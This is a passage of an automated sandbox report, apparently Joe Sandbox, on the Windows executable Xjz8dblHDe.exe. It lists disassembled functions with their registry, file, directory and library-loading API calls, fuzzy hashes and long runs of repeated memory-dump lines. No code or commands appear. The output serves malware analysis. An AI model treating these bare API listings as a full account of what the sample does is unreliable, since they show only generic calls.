                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: FileFindlstrlen$CloseFirstOperation
                                                                    • String ID:
                                                                    • API String ID: 1486964399-0
                                                                    • Opcode ID: 61f3fd282a52c31f5ccd964d07d22c05697a733044f4624dbe4c236db9297d7a
                                                                    • Instruction ID: bbe877ab11025427faf5f2d41b675fbfdb26c0ea37d129f2242468f609b66021
                                                                    • Opcode Fuzzy Hash: 61f3fd282a52c31f5ccd964d07d22c05697a733044f4624dbe4c236db9297d7a
                                                                    • Instruction Fuzzy Hash: 74117071D10314AADF10EFF98A4999EB7B8AF04344F14847FA805F72D1D6B8C4418B59
                                                                    Function 004024F8 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
                                                                    • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00020019), ref: 0040253E
                                                                    • RegCloseKey.KERNELBASE(?,?,?,0040B5A8,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: Enum$CloseValue
                                                                    • String ID:
                                                                    • API String ID: 397863658-0
                                                                    • Opcode ID: 95b9409de080be2480ae3ebee57d62febf19c414c59d57b92fdc5ca9ae51cd4c
                                                                    • Instruction ID: aff41db5cb1f43c080787ec2daae132adce55f0eb50407644cc943dfdce05a74
                                                                    • Opcode Fuzzy Hash: 95b9409de080be2480ae3ebee57d62febf19c414c59d57b92fdc5ca9ae51cd4c
                                                                    • Instruction Fuzzy Hash: 59018471904204BFEB149F95DE88ABF7ABCEF80348F14803EF505B61D0DAB85E419B69
                                                                    Function 00402484 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024B5
                                                                    • RegCloseKey.KERNELBASE(?,?,?,0040B5A8,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: CloseQueryValue
                                                                    • String ID:
                                                                    • API String ID: 3356406503-0
                                                                    • Opcode ID: ef205e07a954bd81c45d0a02b1537dcbd35f0958168012aad3e58056c5502209
                                                                    • Instruction ID: 1ba22ac92ecf447665b3913d31df39b0814a7bcf15a964c104b9173a467dca89
                                                                    • Opcode Fuzzy Hash: ef205e07a954bd81c45d0a02b1537dcbd35f0958168012aad3e58056c5502209
                                                                    • Instruction Fuzzy Hash: 2A119431910205EBDB14DFA4CA585AE77B4FF44348F20843FE445B72C0D6B85A41EB5A
                                                                    Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                    • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
                                                                    • Instruction ID: 2a828f8333626ea4f8ae47897e76cf54d119540c9549312051f7543085d76b41
                                                                    • Opcode Fuzzy Hash: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
                                                                    • Instruction Fuzzy Hash: 9101D132624210ABE7095B789D04B6A3698E751315F10C63BB851F66F1DA7C8C429B4D
                                                                    Function 0040238E Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033,00000002), ref: 004023B0
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 004023B9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: CloseDeleteValue
                                                                    • String ID:
                                                                    • API String ID: 2831762973-0
                                                                    • Opcode ID: abe2d5b86983b76f37ebbeb52e479933b9f051492a06271b13e7fa2919bd31b5
                                                                    • Instruction ID: ea1e1dc52e0dd693c7e9773bcfdc4231a80a88f887ae940f22e44fa758f22ebe
                                                                    • Opcode Fuzzy Hash: abe2d5b86983b76f37ebbeb52e479933b9f051492a06271b13e7fa2919bd31b5
                                                                    • Instruction Fuzzy Hash: 4CF06232A045119BE704ABA49B8EABE72A4AB44354F29403FFA42F71C1CAF85D41576D
                                                                    Function 004053D2 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • OleInitialize.OLE32(00000000), ref: 004053E2
                                                                      • Part of subcall function 0040425A: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040426C
                                                                    • CoUninitialize.COMBASE(00000404,00000000), ref: 0040542E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeMessageSendUninitialize
                                                                    • String ID:
                                                                    • API String ID: 2896919175-0
                                                                    • Opcode ID: a5d0a8451618ff19e96225edef6900da367773b8c911db2a615865548dde1b1f
                                                                    • Instruction ID: 958387d264b6e353c5d11acff8941ae2ccbfc231999d5e23939142942d374e26
                                                                    • Opcode Fuzzy Hash: a5d0a8451618ff19e96225edef6900da367773b8c911db2a615865548dde1b1f
                                                                    • Instruction Fuzzy Hash: A8F024735009108BD3402B40ED02B6773A4EBC5301F05C03FEE84B22E1CB780C408B1E
                                                                    Function 00401573 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: ShowWindow
                                                                    • String ID:
                                                                    • API String ID: 1268545403-0
                                                                    • Opcode ID: 122ece3e66c06ae455bd99493a5e16f46f3acc95e5bbde665d13cf9dfb12216c
                                                                    • Instruction ID: ff893fd080683d27dd3b5e94bf1da30195128cfff23c54bbc30ea882265df843
                                                                    • Opcode Fuzzy Hash: 122ece3e66c06ae455bd99493a5e16f46f3acc95e5bbde665d13cf9dfb12216c
                                                                    • Instruction Fuzzy Hash: DBE04876B141049BCB14CBA8DD8086E77A5A789310724457BD501B3650CA79AD50CF68
                                                                    Function 00406671 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
                                                                      • Part of subcall function 00406601: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406618
                                                                      • Part of subcall function 00406601: wsprintfW.USER32 ref: 00406653
                                                                      • Part of subcall function 00406601: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406667
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                    • String ID:
                                                                    • API String ID: 2547128583-0
                                                                    • Opcode ID: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                    • Instruction ID: f8cbec149f8048a337a195de8e089d72e19c2715f3a6386891d9cbb614a09016
                                                                    • Opcode Fuzzy Hash: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                    • Instruction Fuzzy Hash: D3E08C326042116AD7119A709E4497B66AC9A89740307883EFD46F2181EB3A9C31AAAD
                                                                    Function 00405D8D Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Xjz8dblHDe.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: File$AttributesCreate
                                                                    • String ID:
                                                                    • API String ID: 415043291-0
                                                                    • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                    • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                                    • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                    • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                                    Function 00405D68 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?,?,0040596D,?,?,00000000,00405B43,?,?,?,?), ref: 00405D6D
                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D81
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2093387960.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Xjz8dblHDe.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                    • Instruction ID: 56b75d8f9ca2641e27e40e0bc5846bc1deeaaca66535f557d4a9eea11918b9db
                                                                    • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                    • Instruction Fuzzy Hash: 39D01272504421AFC2512738EF0C89BBF95DF543717128B35FEE9A22F0CB314C568A98
                                                                    Function 0040584B Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,0040335F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004035B6,?,00000006,00000008,0000000A), ref: 00405851
                                                                    • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040585F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2092817394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2092797620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092836990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2092856492.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
